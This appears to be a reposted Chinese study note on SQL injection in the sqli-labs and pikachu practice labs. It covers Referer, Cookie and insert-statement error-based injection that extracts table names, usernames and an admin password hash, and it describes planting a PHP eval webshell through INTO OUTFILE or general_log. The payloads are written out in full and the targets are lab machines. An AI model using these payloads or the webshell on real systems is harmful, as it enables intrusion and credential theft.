SQL注入-下篇

HTTP注入

一、Referer注入

概述

当你访问一个网站的时候,你的浏览器需要告诉服务器你是从哪个地方访问服务器的。
如直接在浏览器器的URL栏输入网址访问网站是没有referer的,需要在一个打开的网站中,点击链接跳转到另一个页面。

Less-19
  1. 判断也是是否存在注入

image.png
image.png

  1. 尝试注入
    1. 使用单引号判断

image.png

  1. 闭合SQL
 http://10.196.93.67/sqli-labs/Less-19/','' ) #  

image.png

  1. 构造语句并注入
    1. 判断是插入语句,尝试报错注入。
http://10.196.93.67/sqli-labs/Less-19/'and updatexml(1,concat('~',(select database()),'~'),1),'' ) #   

image.png

二、Cookies注入

  1. 判断是否有注入
    1. 显示请求头信息

image.png

  1. 闭合语句
    1. 单引号尝试报错,可能注入

image.png

  1. 添加井号,闭合完成

image.png

  1. 构造语句并注入
    1. 报错注入
Cookie: uname=v 'and updatexml(1,concat('~',(select user()),'~'),1) #  

image.png

pikachu靶场搭建

  1. github地址:https://github.com/zhuifengshaonianhanlu/pikachu
  2. 下载后解压放入文件到Apache服务中的www根目录中
  3. 在mysql数据库中创建一个任意的数据库(示例:pikachu)
  4. 在pikachu目录中找到config.inc.php文件
    1. 位置:WWW\pikachu\inc文件下
  5. 修改config.inc.php配置
# DBNAME 为创建的开始创建的空数据库
#
<?php
//全局session_start
session_start();
//全局居设置时区
date_default_timezone_set('Asia/Shanghai');
//全局设置默认字符
header('Content-type:text/html;charset=utf-8');
//定义数据库连接参数
define('DBHOST', '127.0.0.1');//将localhost或者127.0.0.1修改为数据库服务器的地址
define('DBUSER', 'root');//将root修改为连接mysql的用户名
define('DBPW', 'root');//将root修改为连接mysql的密码,如果改了还是连接不上,请先手动连接下你的数据库,确保数据库服务没问题在说!
define('DBNAME', 'pikachu');//自定义,建议不修改
define('DBPORT', '3306');//将3306修改为mysql的连接端口,默认tcp3306?>
  1. 网站初始化
    1. 进入网址:http://localhost/pikachu/install.php
    2. 点击初始化按钮,出现下方的红字,初始化成功。

image.png

注入漏洞登录网站(pikachu靶场)

一、寻找注入点

  1. 网址:http://10.196.93.67/pikachu/vul/sqli/sqli_iu/sqli_reg.php
  2. 判断是否能注入:
    1. 单引号判断,出现sql报错既可注入。
    2. image.png
    3. image.png

二、闭合语句

  1. 注册功能,使用的是插入,大概率补全字段数既可闭合语句。
username=','','','','','')# &password=%27&sex=%27&phonenum=%27&email=%27&add=%27&submit=submit  

image.png

三、注入

  1. 尝试报错注入
    1. 数据库名:pikachu
username=','','','','',''and updatexml(1,concat('~!',(select database()),'~'),1))# &password=%27&sex=%27&phonenum=%27&email=%27&add=%27&submit=submit

image.png

  1. 查询pikachu中表名
    1. 查询表的数量
username=','','','','',''and updatexml(1,concat('~',(select count(*) from information_schema.`TABLES` where TABLE_SCHEMA = database()),'~'),1))# &password=%27&sex=%27&phonenum=%27&email=%27&add=%27&submit=submit  
# 结果:5张

image.png

  1. 使用group_concat()查询()
# sql
username=','','','','',''and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.`TABLES` where TABLE_SCHEMA = database()),'~'),1))# &password=%27&sex=%27&phonenum=%27&email=%27&add=%27&submit=submit
#结果:XPATH syntax error: '~httpinfo,member,message,users,x'
# 并没有显示完整,还差最后一张
# 查询最后一张,使用limit或直接使用suhstr()
# sql
username=','','','','',''and updatexml(1,concat('~',(select table_name from information_schema.`TABLES` where TABLE_SCHEMA = database()limit 4,1),'~'),1))# &password=%27&sex=%27&phonenum=%27&email=%27&add=%27&submit=submit
# 结果:XPATH syntax error: '~xssblind~'# 最后查询结果:httpinfo,member,message,users,xssblind

image.png
image.png

  1. 查询users表中的字段名称
username=','','','','',''and updatexml(1,concat('~',(select GROUP_CONCAT(column_name) from information_schema.`COLUMNS` where TABLE_SCHEMA = 'pikachu' and TABLE_NAME = 'users'),'~'),1))# &password=%27&sex=%27&phonenum=%27&email=%27&add=%27&submit=submit  
# 结果:XPATH syntax error: '~id,username,password,level~'

image.png

  1. 查询users表中的数据
    1. 查询用户名
username=','','','','',''and updatexml(1,concat('~',(select group_concat(username) from users),'~'),1))# &password=%27&sex=%27&phonenum=%27&email=%27&add=%27&submit=submit  
# 结果:XPATH syntax error: '~admin,pikachu,test~'

image.png

  1. 查询admin用户密码
username=','','','','',''and updatexml(1,concat('~',(select password from users where username = "admin"),'~'),1))# &password=%27&sex=%27&phonenum=%27&email=%27&add=%27&submit=submit
# 结果:XPATH syntax error: '~e10adc3949ba59abbe56e057f20f883' 
# 根据结果发现:
# 一:密码使用md5加密
# 二:密码并没有显示完全,需要在使用substr()截取函数,补全密码并解码
# 真实密码:e10adc3949ba59abbe56e057f20f883e 
# 解码得:123456
  1. ![image.png](https://cdn.nlark.com/yuque/0/2024/png/38516294/1718765775832-d22d61a3-7225-4b94-98c4-c3b847844bcb.png#averageHue=%23626161&clientId=u0c23c550-2eef-4&from=paste&height=614&id=uc59ac8c5&originHeight=614&originWidth=1343&originalType=binary&ratio=1&rotation=0&showTitle=false&size=72813&status=done&style=none&taskId=ue08d257f-066c-4145-8f12-84cab89f64d&title=&width=1343)2. ![image.png](https://cdn.nlark.com/yuque/0/2024/png/38516294/1718765956800-75a89c27-539b-4481-82d7-2e56c86379ce.png#averageHue=%23f6f6f5&clientId=u0c23c550-2eef-4&from=paste&height=282&id=ua689a11a&originHeight=282&originWidth=860&originalType=binary&ratio=1&rotation=0&showTitle=false&size=24564&status=done&style=none&taskId=u0f221d0c-234e-47d1-8477-af918a5df21&title=&width=860)

webShell

一、简介

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。
顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作命令。webshell主要用于网站和服务器管理,由于其便利性和功能强大,被特别修改后的webshell也被部分人当作网站后门工具使用。

二、网站渗透流程

1、信息收集
2、网站漏洞挖掘
3 利用漏洞3.1、获取webShell3.2、获取网站后台权限3.2.1、获取webShell

三、一句话木马

一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用

1 满足条件
  1. 木木马成功上传,为被杀
  2. 知道木马的路径在哪
  3. 上传的木马能正常运行
  4. 有PHP运行环境
2 PHP
# @ :表示后面及时后面执行错误,也不会报错。
# eval() 把参数当做代码来执行。
# 以POST方式获取到cmd的值
<?php @eval($_POST["cmd"]); ?># 扩展:php方法
# 可以执行系统命令
# 容易被杀毒软件杀掉
system();

3 中国蚁剑
  1. 连接

image.png

  1. 打开虚拟终端

image.png

四、SQL注入获取webShell

  1. 前提条件
    1. 当前sql注入用户必须为DBA权限(–is-dba为true)
    2. 需要知道网站的绝对路径
    3. My.ini文件中的这项配置secure_file_priv = “” 为空
  2. 技巧
    1. 单引号暴露绝对路径/错误参数暴露绝对路径

image.png

  1. secure_file_priv注入演示
    1. 设置my.ini 该字段为空
secure_file_priv = 

image.png

  1. 注入
select * from `security`.users where id = '-1' union select 1,2,LOAD_FILE("D:/phpStudy/PHPTutorial/WWW/sqli-labs/Less-1/index.php/INDEX.php");
  1. into outfile
    1. 将查询数据写到到本地
select *  into outfile 'D:/phpStudy/PHPTutorial/MySQL/aaaaa.txt' from `security`.users ;

五、phpmyAdmin获取webShell

  1. 前提条件
    1. 当前sql注入用户必须为DBA权限(–is-dba为true)
    2. 需要知道网站的绝对路径
    3. My.ini文件中的这项配置secure_file_priv = “” 为空
  2. 宝塔漏洞
    1. 访问网址既可进入到phpMyAdmin管理页面
    2. http://www.xx.com:888/pma
  3. 通过查询将一句话木马写到到本地。

六、全局日志

  1. 设置全局日志
set global general_log_file = 'xxx/xx.php'
# 再写入一句话木马

DnsLog盲注

使用网址:http://www.dnslog.cn/

利用条件

image.png

固定语句

image.png

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/30494.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

第29讲:Ceph集群使用RBD块存储设备与K8S的PV集成

文章目录 1.Ceph集群使用RBD块存储与K8S集成简介2.Ceph集群RBD块存储与K8S PV存储卷集成2.1.创建K8S集群PV使用的块存储2.2.创建K8S集群访问RBD块存储设备的认证用户2.3.将认证用户的Key存储在K8S Secret资源中2.4.在K8S集群的所有节点中安装Ceph命令2.5.创建PV及PVC资源使用RB…

C#开发-集合使用和技巧(八)集合中的排序Sort、OrderBy、OrderByDescending

C#开发-集合使用和技巧&#xff08;八&#xff09;集合中的排序Sort、OrderBy、OrderByDescending List<T>.Sort()IEnumerable<T>.OrderBy()Enumerable<T>.OrderByDescending() 在C#中&#xff0c;List<T> 类提供了多种方法来进行排序&#xff0c;最常…

jax.nn.initializers.glorot_normal()

import jax import jax.numpy as jnp from jax import random import jax.nn.initializers as init# 设置随机数种子 key random.PRNGKey(42)# 定义权重的形状 shape (in_dim, out_dim)# 获取 Glorot 正态初始化函数 glorot_normal_init init.glorot_normal()# 初始化权重 w…

QT基础 - QMainWindow主窗口

目录 零. 简介 一. 菜单栏 二. 工具栏 三. 状态栏 四. 可停靠区域 五. 总结 零. 简介 QMainWindow 是 Qt 中用于构建主窗口的类。 它通常包含以下几个主要部分&#xff1a; 菜单栏&#xff1a;用于提供各种操作选项。工具栏&#xff1a;放置常用的操作按钮。中心区域&…

搭建Vue的环境

目录 # 开篇 步骤一&#xff0c;准备Vue 的环境 步骤二&#xff0c;下载Vue.js的包 步骤三&#xff0c;创建并打开写前端代码的文件夹 步骤四&#xff0c;在VSCode中引入Vue.js的包 步骤五&#xff0c;创建第一个vue.html Vue其他知识 Vue.config命令 # 开篇 介绍&…

详细分析Element Plus的el-pagination基本知识(附Demo)

目录 前言1. 基本知识2. Demo3. 实战 前言 需求&#xff1a;从无到有做一个分页并且附带分页的导入导出增删改查等功能 前提一定是要先有分页&#xff0c;作为全栈玩家&#xff0c;先在前端部署一个分页的列表 相关后续的功能&#xff0c;是Java&#xff0c;推荐阅读&#x…

数据结构:4.1.2二叉搜索树的插入

整个框架和FInd函数的实现是一样的&#xff0c;但是也有不同&#xff08;注意&#xff09; 35>30 向30的右子树 35<41 向41的左子树 35>33 向33的右子树&#xff0c;但33右边为空&#xff0c;所以35就挂在33的右边 因为要把35挂在33的右边&#xff0c;所以要把33的…

Solkane 冷媒性能计算软件-管路计算

下载 制冷管道设计 制冷管路的压降会降低制冷量&#xff0c;增大功耗。但不同部分的管路允许的压降的数量级是不同的。 制冷管路的压降不是唯一的考虑因素&#xff0c;制冷剂的流速往往比压降更重要。 制冷系统中&#xff0c;压缩机、阀、汽液分离器或其他附件上的连接件的尺…

VSCode 安装NeoVim扩展(详细)

目录 1、安装NeoVim扩展 2、windows安装Neovim软件 3、优化操作相关的配置&#xff1a; 5、Neovim最好的兼容性配置 6、技巧和特点 6.1 故障排除 6.2、Neovim 插件组合键设置 6.3、跳转列表 1、安装NeoVim扩展 在扩展商店搜索NeoVim&#xff0c;安装扩展 2、windows安装…

重学java 77.JDK新特性 ③ Stream流

The road is long,it can be really hard.Whatever you do,you hold on to that foolishly hopeful smile —— 24.6.19 Stream流 stream流中的"流"不是特指"IO流",它是一种"流式编程"(编程方式),可以看做是"流水线 package S109Stream;im…

【Python机器学习实战】 | Lasso回归和弹性网回归详细分析研究

&#x1f3a9; 欢迎来到技术探索的奇幻世界&#x1f468;‍&#x1f4bb; &#x1f4dc; 个人主页&#xff1a;一伦明悦-CSDN博客 ✍&#x1f3fb; 作者简介&#xff1a; C软件开发、Python机器学习爱好者 &#x1f5e3;️ 互动与支持&#xff1a;&#x1f4ac;评论 &…

react使用OpenLayers实现类似船某网在地图放大时展示具体船舶符号缩小时显示聚合小点效果

一、效果 如图所示&#xff0c;地图缩小&#xff08;即比例尺放大&#xff09;时&#xff0c;显示聚合小绿点&#xff1b; 地图放大&#xff08;比例尺缩小&#xff09;时&#xff0c;展示具体船舶符号&#xff1a; 二、思路 1&#xff09;设置2个图层&#xff0c;一个展示…

计网重点面试题-TCP三次握手四次挥手

三次握手 第一次握手(syn1) 客户端会随机初始化序号&#xff08;client_isn&#xff09;&#xff0c;将此序号置于 TCP 首部的「序列号」字段中&#xff0c;同时把 SYN 标志位置为 1&#xff0c;表示 SYN 报文。接着把第一个 SYN 报文发送给服务端&#xff0c;表示向服务端发…

Microsoft Edge 查看已保存账号的密码

1、打开更多菜单选项 打开浏览器右上角的“...”设置及其他&#xff0c;快捷键&#xff1a;ALTF。 2、打开设置选项 选择“设置”&#xff0c;快捷键&#xff1a;g 3、点击密码 在“个人资料”选项中找到密码选项 4、电子钱包 电子钱包会显示“站点和应用”所保存的账户信息…

JAVAEE之网络原理(2)_传输控制协议(TCP)的连接管理机制,三次握手、四次挥手,及常见面试题

前言 在上一节中&#xff0c;我们简单介绍了 TCP 协议的相关概念和格式&#xff0c;而且还介绍了TCP 协议原理中的 确认应答机制、超时重传机制&#xff0c;在本节中我们将会继续介绍 TCP协议原理中的其他机制。 连接管理机制&#xff08;安全机制&#xff09; 在正常情况下&…

lvgl的应用:移植MusicPlayer(基于STM32F407)

目录 概述 1 软硬件环境 1.1 UI开发版本 1.2 MCU开发环境 1.3 注意点 2 GUI Guider开发UI 2.1 使用GUI Guider创建UI 2.2 GUI Guider编译项目和测试 2.2.1 GUI Guider编译项目 2.2.2 编译 2.3 了解GUI Guider生成代码 3 移植项目 3.1 Keil中加载代码 3.2 调用G…

漏洞挖掘 | 记一次src挖掘-小程序敏感信息泄露

权当是一次漏洞挖掘的思路分享 闲言 就现在的一个web漏洞挖掘强度还是非常高的&#xff0c;所以我们不妨把我们的眼光投向一个之前可能未曾涉及到的区域———小程序 是的微信小程序&#xff0c;这玩意的防范能力和过滤能力其实对比web方向是要弱小很多的 进入正题 以下就是…

Javase.抽象类和接口

抽象类和接口 【本节目标】1.抽象类1.1抽象类的概念1.2 抽象类语法1.3 抽象类特性1.4 抽象类的作用 2. 接口2.1 接口的概念2.2 语法规则2.3 接口使用2.4 接口特性2.5 实现多个接口2.6 接口间的继承2.7 接口使用实例2.8Clonable 接口和深拷贝2.9 抽象类和接口的区别 3. Object类…

GT_BERT文本分类

目录 GT-BERT结束语代码实现整个项目源码&#xff08;数据集模型&#xff09; GT-BERT 在为了使 BERT 模型能够得到广泛的应用,在保证模型分类准确率不降低的情况下,减少模型参数规模并降低时间复杂度,提出一种基于半监督生成对抗网络与 BERT 的文本分类模型 GT-BERT。模型的整…

【ajax基础04】form-serialize插件

目录 一&#xff1a;form-serialize插件 作用&#xff1a; 语法格式&#xff1a; 一&#xff1a;form-serialize插件 作用&#xff1a; 快速且大量的收集表单元素的值 例如上图对于多表单元素的情形&#xff0c;单靠通过”选择器获取节点.value”值的形式&#xff0c;获取…